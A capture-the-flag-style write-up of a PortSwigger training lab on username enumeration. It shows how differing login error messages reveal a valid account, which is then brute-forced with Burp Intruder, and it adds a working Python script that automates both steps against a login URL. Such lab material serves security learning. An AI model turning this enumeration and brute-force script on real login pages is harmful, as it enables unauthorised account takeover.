Username enumeration via different responses
https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses
Last updated
We can click on My Account to reach the login form. After submitting a login attempt, the POST request appears in Burp Suite under Proxy > HTTP History.
Send that request to Intruder and add a payload position on the username parameter, leaving the password parameter set to any dummy value.
In the Payloads tab, set the Payload type to Simple list and paste the candidate usernames provided by the lab into the Payload settings section.
Let's start the attack.
Sorting the results by status code or response length, we can observe that the request with username set to analyzer returned a different response than all the others. The application answers a non-existent username and a valid username with a wrong password with two different error messages, which is exactly the information leak that makes username enumeration possible: every other candidate produced the same response, so analyzer is the one valid account.
Now we can craft a second attack by setting the username parameter to analyzer and adding a payload position on the password parameter.
In the Payloads tab we again use a Simple list, this time pasting the candidate passwords provided by the lab into the Payload settings section.
We are now set to start the attack.
As we can see, the request with the password set to 1234567890 receives a 302 redirect, while every wrong password gets the same 200 response with the error message. The redirect is the successful login. Now that we know both the username and the password, we can log in through the browser.
We have solved the lab.
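As an added example that is not part of the original walkthrough, the two Intruder attacks above can be scripted. The first function sends every candidate username with a dummy password and returns the one whose response differs from all the others; the second tries each candidate password against that username and stops at the first 302. The live sender takes the lab's login URL as an argument (the URL is an assumption; the form parameter names username and password come from the walkthrough). The offline stand-in reproduces only the observable behaviour described above; its error texts and the sample wordlists are constructed.

```python
"""Scripted version of the two Intruder attacks from the walkthrough."""
from collections import Counter
from typing import Callable, Iterable, Optional, Tuple
import urllib.error
import urllib.parse
import urllib.request

# A sender submits one login attempt and returns (status_code, body_text).
Sender = Callable[[str, str], Tuple[int, str]]


def make_http_sender(login_url: str) -> Sender:
    """Live sender for a lab instance. login_url is an assumption, e.g.
    "https://<lab-id>.web-security-academy.net/login". Redirects are NOT
    followed, so a successful login surfaces as a 302 rather than as the
    /my-account page it redirects to."""

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # refuse to follow; urllib then raises HTTPError(302)

    opener = urllib.request.build_opener(NoRedirect)

    def send(username: str, password: str) -> Tuple[int, str]:
        data = urllib.parse.urlencode(
            {"username": username, "password": password}).encode()
        req = urllib.request.Request(login_url, data=data, method="POST")
        try:
            with opener.open(req) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # 302, 4xx and 5xx land here
            return err.code, err.read().decode(errors="replace")

    return send


def enumerate_username(send: Sender, usernames: Iterable[str],
                       dummy_password: str = "invalid") -> Optional[str]:
    """First attack: every candidate username with the same dummy password.
    Responses are bucketed by (status, body); the single candidate whose
    response is unlike all the others is the valid account. Returns None when
    no unique outlier exists (no valid user in the list, or a page that varies
    per request, e.g. one that echoes the submitted username)."""
    responses = {u: send(u, dummy_password) for u in usernames}
    counts = Counter(responses.values())
    outliers = [u for u, r in responses.items() if counts[r] == 1]
    return outliers[0] if len(outliers) == 1 else None


def brute_force_password(send: Sender, username: str,
                         passwords: Iterable[str]) -> Optional[str]:
    """Second attack: fixed username, every candidate password. Wrong guesses
    get a 200 with an error message; the correct one is redirected (302)."""
    for password in passwords:
        status, _ = send(username, password)
        if status == 302:
            return password
    return None


def fake_lab_sender(valid_user: str = "analyzer",
                    valid_pass: str = "1234567890") -> Sender:
    """Constructed offline stand-in for the lab. Unknown username -> 200 with
    one message; known username, wrong password -> 200 with a different
    message; correct pair -> 302. The message texts are an assumption; only
    the fact that the two cases differ matters for the enumeration."""

    def send(username: str, password: str) -> Tuple[int, str]:
        if username != valid_user:
            return 200, '<p class="is-warning">Invalid username</p>'
        if password != valid_pass:
            return 200, '<p class="is-warning">Incorrect password</p>'
        return 302, ""

    return send


if __name__ == "__main__":
    # Constructed sample wordlists standing in for the lab's candidate lists.
    users = ["carlos", "root", "admin", "analyzer", "test"]
    passwords = ["123456", "password", "1234567890", "qwerty"]
    # Swap for make_http_sender("https://<lab-id>.web-security-academy.net/login")
    send = fake_lab_sender()
    user = enumerate_username(send, users)
    print("username:", user)
    print("password:", brute_force_password(send, user, passwords) if user else None)
```

Bucketing on the full (status, body) pair is stricter than Intruder's Length column: two responses of equal length but different text are still told apart, while any per-request content (a CSRF token, an echoed username) would break the comparison and needs to be stripped from the body before bucketing.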
Username | Password |
---|---|
analyzer | 1234567890 |